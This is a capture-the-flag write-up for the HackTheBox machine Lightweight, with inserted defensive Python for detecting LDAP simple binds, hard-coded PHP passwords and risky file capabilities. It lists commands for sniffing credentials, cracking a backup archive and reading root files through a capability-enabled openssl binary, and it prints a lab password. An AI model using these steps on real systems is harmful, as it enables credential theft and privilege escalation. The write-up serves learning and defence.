HackTheBox Lightweight
Heyo nullers
Welcome to my writeup for the recently retired box Lightweight from HackTheBox.
Lightweight was tricky at the beginning. In general, it had:
- Packet sniffing
- LDAP Authentication
- File capabilities
Portscan:
Nmap showed three open ports: ssh, http and ldap.
Nmap scan report for 10.10.10.119
Host is up (0.61s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
| 256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_ 256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (EdDSA)
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after: 2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time
On port 80:
The user page prompted me to log in via ssh with my IP as both username and password.
So after doing that, and taking a hint from @pry0cc and @guly, I just "listened" to the box for as long as I had to. I ran tcpdump -i lo -A -w inter.pcap
on the Lightweight box and then I just browsed the webpage. The status.php page was taking quite a while to load, so that was suspicious.
After browsing the website enough, I moved the pcap file to /tmp and transferred it to my local computer with scp [email protected]:/tmp/inter.pcap .
Opening the file with Wireshark, we find an LDAP "bind request" from ldapuser2 using simple authentication, meaning that ldapuser2's password was in plain sight.
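What Wireshark is showing there is an LDAP BindRequest whose AuthenticationChoice is "simple", i.e. the password is an OCTET STRING in the packet, readable by anyone who can see the traffic (here, loopback) unless the session is wrapped in TLS. The following is an added example, not code from the writeup: a minimal BER decoder for the LDAPMessage/BindRequest subset that flags simple binds in a captured TCP payload and records the credential only as a length. The sample frames are constructed with the encoder in the same block; the DN, password and mechanism are invented.

```python
# Added example (not from the original writeup): detect cleartext LDAP simple binds
# in a captured byte stream. Only the BER subset needed for LDAPMessage and
# BindRequest is implemented; sample inputs below are constructed, not captured.

def _encode_len(n):
    """BER definite-form length (short form below 128, long form above)."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag, body):
    """Tag-Length-Value encoder used to build the constructed samples."""
    return bytes([tag]) + _encode_len(len(body)) + body

def read_tlv(buf, pos=0):
    """Decode one TLV at buf[pos]; returns (tag, value, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length

def children(body):
    """Split a constructed value into its list of (tag, value) children."""
    out, pos = [], 0
    while pos < len(body):
        tag, value, pos = read_tlv(body, pos)
        out.append((tag, value))
    return out

def build_simple_bind(msg_id, dn, password):
    # BindRequest [APPLICATION 0] { version 3, name, simple [0] OCTET STRING }
    bind = tlv(0x02, b"\x03") + tlv(0x04, dn.encode()) + tlv(0x80, password.encode())
    return tlv(0x30, tlv(0x02, bytes([msg_id])) + tlv(0x60, bind))

def build_sasl_bind(msg_id, dn, mechanism):
    # sasl [3] SaslCredentials { mechanism OCTET STRING } (context tag 3, constructed)
    bind = tlv(0x02, b"\x03") + tlv(0x04, dn.encode()) + tlv(0xA3, tlv(0x04, mechanism.encode()))
    return tlv(0x30, tlv(0x02, bytes([msg_id])) + tlv(0x60, bind))

def inspect_bind(frame):
    """Return a finding for one LDAPMessage, or None if it is not a BindRequest."""
    tag, body, _ = read_tlv(frame)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    (_, mid), (op_tag, op) = children(body)[:2]
    if op_tag != 0x60:                      # [APPLICATION 0] = BindRequest
        return None
    version, name, auth = children(op)[:3]
    finding = {
        "message_id": int.from_bytes(mid, "big"),
        "ldap_version": int.from_bytes(version[1], "big"),
        "bind_dn": name[1].decode(errors="replace"),
    }
    if auth[0] == 0x80:                     # simple: the password itself is in the frame
        finding.update(auth="simple", cleartext_credential=True,
                       password_length=len(auth[1]))   # length only, never the value
    elif auth[0] == 0xA3:                   # SASL: mechanism decides, no cleartext password field
        finding.update(auth="sasl", cleartext_credential=False,
                       mechanism=children(auth[1])[0][1].decode())
    return finding

def scan_stream(payload):
    """Walk a TCP payload holding several LDAPMessages and collect bind findings."""
    findings, pos = [], 0
    while pos < len(payload):
        end = read_tlv(payload, pos)[2]
        f = inspect_bind(payload[pos:end])
        if f:
            findings.append(f)
        pos = end
    return findings

# Constructed samples (not real traffic): a simple bind, an UnbindRequest, a SASL bind.
SAMPLE_SIMPLE = build_simple_bind(1, "uid=alice,dc=example,dc=com", "correct horse")
SAMPLE_UNBIND = tlv(0x30, tlv(0x02, b"\x03") + bytes([0x42, 0x00]))
SAMPLE_SASL = build_sasl_bind(2, "", "GSSAPI")
SAMPLE_STREAM = SAMPLE_SIMPLE + SAMPLE_UNBIND + SAMPLE_SASL

if __name__ == "__main__":
    for f in scan_stream(SAMPLE_STREAM):
        print(f)
```

The check is the same one Wireshark's LDAP dissector makes when it labels the bind as simple authentication; the fix on the server side is to require StartTLS/LDAPS or a SASL mechanism for binds, and on the client side to never bind in the clear even to localhost, since loopback is exactly where the writeup captured it.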
By using it to su to ldapuser2 we get the user flag.
su ldapuser2
Password:
[ldapuser2@lightweight ~]$ ls
backup.7z OpenLDAP-Admin-Guide.pdf OpenLdap.pdf user.txt
[ldapuser2@lightweight ~]$ cat user.txt
8a866d3b*******************
In ldapuser2's home directory we find a backup.7z file. I transferred it to my local machine like the pcap file, only to find out that it was password protected. There I used a script I found here which uses john to bruteforce the 7z file. The password was delete
There I found some PHP files, which are the same as the website's, only with a twist:
after running cat * | grep user
in a desperate move for something valuable, I found that the user is ldapuser1,
vict0ni@vict0niLaptop:~/Desktop/CTF/HTB/Lightweight/backup$ cat * | grep username
$username = 'ldapuser1';
so the next logical thing to do is to run cat * | grep password, where we find ldapuser1's password
vict0ni@vic0niLaptop:~/Desktop/CTF/HTB/Lightweight/backup$ cat * | grep password
$password = 'f3ca9d298a553da117442deeb6fa932d';
if ($bind=ldap_bind($ds, $dn, $password)) {
...
...
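The lesson for whoever owns that web root is that the LDAP bind password was a string literal in the PHP source, so any copy of the source (a backup archive, a git checkout, a misconfigured web server serving .php as text) leaks a working credential. The following is an added example, not code from the writeup: a small line-based scanner for PHP that reports literal assignments to password-like variables and literal passwords passed straight to ldap_bind(), printing a redacted value and its length rather than the secret. The sample file, variable names and credentials are constructed for the example; the keyword list is an assumption, not a standard.

```python
import re

# Added example (not from the original writeup): flag hard-coded credentials in
# PHP source. The sample below is constructed; nothing here is the box's real code.

# Variable-name fragments that almost always denote a stored secret (assumed list).
SECRET_VARS = r"(?:password|passwd|pass|pwd|secret|api_key|apikey|token|bind_pw)"

# $password = 'literal';   or   $password = "literal";
ASSIGN_RE = re.compile(
    r"\$(?P<var>\w*" + SECRET_VARS + r"\w*)\s*=\s*(?P<q>['\"])(?P<val>.*?)(?P=q)\s*;",
    re.IGNORECASE,
)
# One call argument: a quoted string (may contain commas, e.g. a DN) or a bare token.
ARG = r"""(?:"[^"]*"|'[^']*'|[^,()]+)"""
# ldap_bind($conn, $dn, 'literal') : literal password handed straight to the bind.
BIND_RE = re.compile(
    r"ldap_bind\s*\(\s*" + ARG + r"\s*,\s*" + ARG
    + r"\s*,\s*(?P<q>['\"])(?P<val>.*?)(?P=q)\s*\)",
    re.IGNORECASE,
)

def redact(value):
    """Keep just enough of the value to recognise it in a report."""
    if len(value) <= 4:
        return "*" * len(value)
    return value[:2] + "*" * (len(value) - 2)

def scan_php(source, filename="<string>"):
    """Return findings for one PHP file. Line-based: a call split over several
    lines is not matched (a limitation of this example, not of the technique)."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in ASSIGN_RE.finditer(line):
            if not m.group("val"):
                continue                     # empty placeholder, nothing leaked
            findings.append({"file": filename, "line": lineno,
                             "kind": "literal-assignment", "name": "$" + m.group("var"),
                             "value_redacted": redact(m.group("val")),
                             "length": len(m.group("val"))})
        for m in BIND_RE.finditer(line):
            findings.append({"file": filename, "line": lineno,
                             "kind": "literal-ldap-bind-password", "name": "ldap_bind",
                             "value_redacted": redact(m.group("val")),
                             "length": len(m.group("val"))})
    return findings

# Constructed sample: a username alone is not flagged, a literal password is,
# a password read from the environment is not, and an empty placeholder is not.
SAMPLE_PHP = """<?php
$ds = ldap_connect("ldap://localhost");
$username = 'svc_web';
$password = 'Winter2019!';
$dn = "uid=$username,dc=example,dc=com";
if ($bind = ldap_bind($ds, $dn, $password)) {
    echo "bound as $dn";
}
ldap_bind($ds, "cn=admin,dc=example,dc=com", "Adm1nPass");
$good_password = getenv('LDAP_BIND_PASSWORD');
$empty_password = '';
"""

if __name__ == "__main__":
    for f in scan_php(SAMPLE_PHP, "backup/status.php"):
        print(f"{f['file']}:{f['line']} {f['kind']} {f['name']} "
              f"value={f['value_redacted']} ({f['length']} chars)")
```

Run it over an unpacked backup or a checkout before the archive is created; the environment-variable form on the second-to-last sample line is the shape the code should have had, with the secret supplied by the deployment rather than the source.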
Switching to ldapuser1 with su, as before with ldapuser2.
[ldapuser2@lightweight ~]$ su ldapuser1
Password:
[ldapuser1@lightweight ldapuser2]$ whoami
ldapuser1
There, root got a bit spoiled for me, because some people were giving away clues inside the box. Specifically, one broadcast the message "openssl is the key". Kind of a bummer, but finding two binaries in the home directory meant that the way to root had to do with one of them. So the spoiler just saved me a rabbit hole. But, please, don't spoil things.
I enumerated the openssl binary I had in front of me. After examining its capabilities with getcap -r openssl, the output was openssl =ep: an empty capability list in front of =ep stands for every capability, raised in the permitted and effective sets, which means the binary bypasses file permission checks entirely and can access anything.
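That =ep line is the thing a defender wants an audit to catch, and it is easy to miss among the benign entries (ping with cap_net_raw, tcpdump with cap_net_admin,cap_net_raw). The following is an added example, not code from the writeup: a parser for libcap's capability text grammar as printed by getcap, in both the older "path = cap_x+ep" form and the newer "path cap_x=ep" form (libcap 2.41 and later), which reports binaries with all capabilities or with capabilities that defeat the permission model. The getcap output is constructed; apart from the writeup's openssl path the entries are invented, and the high-risk list is this example's own choice.

```python
import re

# Added example (not from the original writeup): audit `getcap -r / 2>/dev/null`
# output. The sample output and the HIGH_RISK list are this example's assumptions.

# Capabilities that by themselves let a binary read or change files it does not
# own, change identity, or reach privileged kernel operations.
HIGH_RISK = {
    "cap_dac_override", "cap_dac_read_search", "cap_chown", "cap_fowner",
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module",
}

CLAUSE_RE = re.compile(r"^([a-z0-9_,]*)((?:[=+-][eip]*)+)$")
OP_RE = re.compile(r"([=+-])([eip]*)")

def parse_cap_text(text):
    """Parse libcap cap_to_text() output into {capability: set(flags)}.
    Forms seen from getcap: '= cap_net_raw+ep' (older), 'cap_net_raw=ep' (newer),
    and '=ep', where an empty list before the operator means ALL capabilities;
    that case is recorded under the pseudo-name 'all'."""
    state = {}
    for clause in text.split():
        m = CLAUSE_RE.match(clause)
        if not m:
            raise ValueError(f"unparseable capability clause: {clause!r}")
        names = [n for n in m.group(1).split(",") if n]
        for op, flags in OP_RE.findall(m.group(2)):
            flags = set(flags)
            if not names:                          # clause applies to every capability
                if op == "=":
                    state = {"all": set(flags)}    # '=' resets everything first
                else:
                    state.setdefault("all", set())
                    for s in state.values():
                        (s.update if op == "+" else s.difference_update)(flags)
                continue
            for name in names:                     # named caps start from the 'all' default
                cur = state.setdefault(name, set(state.get("all", set())))
                if op == "=":
                    cur.clear()
                    cur.update(flags)
                elif op == "+":
                    cur.update(flags)
                else:
                    cur.difference_update(flags)
    return state

def parse_getcap_line(line):
    """getcap prints '<path> <cap text>'; the cap text may itself contain spaces
    ('= cap_net_raw+ep'), so split on the first whitespace run only.
    Paths containing whitespace are not handled (assumption of this example)."""
    path, cap_text = line.strip().split(None, 1)
    return path, cap_text

def audit_getcap_output(output):
    """Return [(path, reason)] for binaries whose file capabilities need review."""
    findings = []
    for line in output.splitlines():
        if not line.strip():
            continue
        path, cap_text = parse_getcap_line(line)
        caps = parse_cap_text(cap_text)
        # A capability counts when permitted or effective; inheritable-only is
        # not usable by the binary on its own.
        active = {name for name, flags in caps.items() if flags & {"e", "p"}}
        if "all" in active:
            findings.append((path, "all capabilities raised (=ep): full file-permission bypass"))
        elif active & HIGH_RISK:
            findings.append((path, "high-risk capabilities: " + ",".join(sorted(active & HIGH_RISK))))
    return findings

# Constructed sample of getcap -r output mixing both print formats.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/openssl =ep
/opt/legacy/filecopy cap_dac_read_search,cap_dac_override=ep
"""

if __name__ == "__main__":
    for path, reason in audit_getcap_output(SAMPLE_GETCAP):
        print(f"{path}: {reason}")
```

Feed it the real output of getcap -r / 2>/dev/null on a host you administer; ping and tcpdump stay quiet, while anything with =ep or a DAC-bypass capability shows up, which is the entry that should not exist on a user-writable copy of openssl in a home directory.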
So to get the root.txt file, one reads it with openssl, writes out a base64-encoded copy in a writable directory, then decodes that copy to read it, like /home/ldapuser1/openssl enc -base64 -in /root/root.txt -out enc_root and then base64 -d enc_root.
And there is the sweet root flag
[ldapuser1@lightweight ~]$ /home/ldapuser1/openssl enc -base64 -in /root/root.txt -out enc_root
[ldapuser1@lightweight ~]$ base64 -d enc_root
f1d4e309c*******************
PS: As @PresComm once said: "But if you don't get a shell and can't run code, is a system really owned?".
Searching for some way to get a root shell I came across this article, where one can rewrite the /etc/shadow file.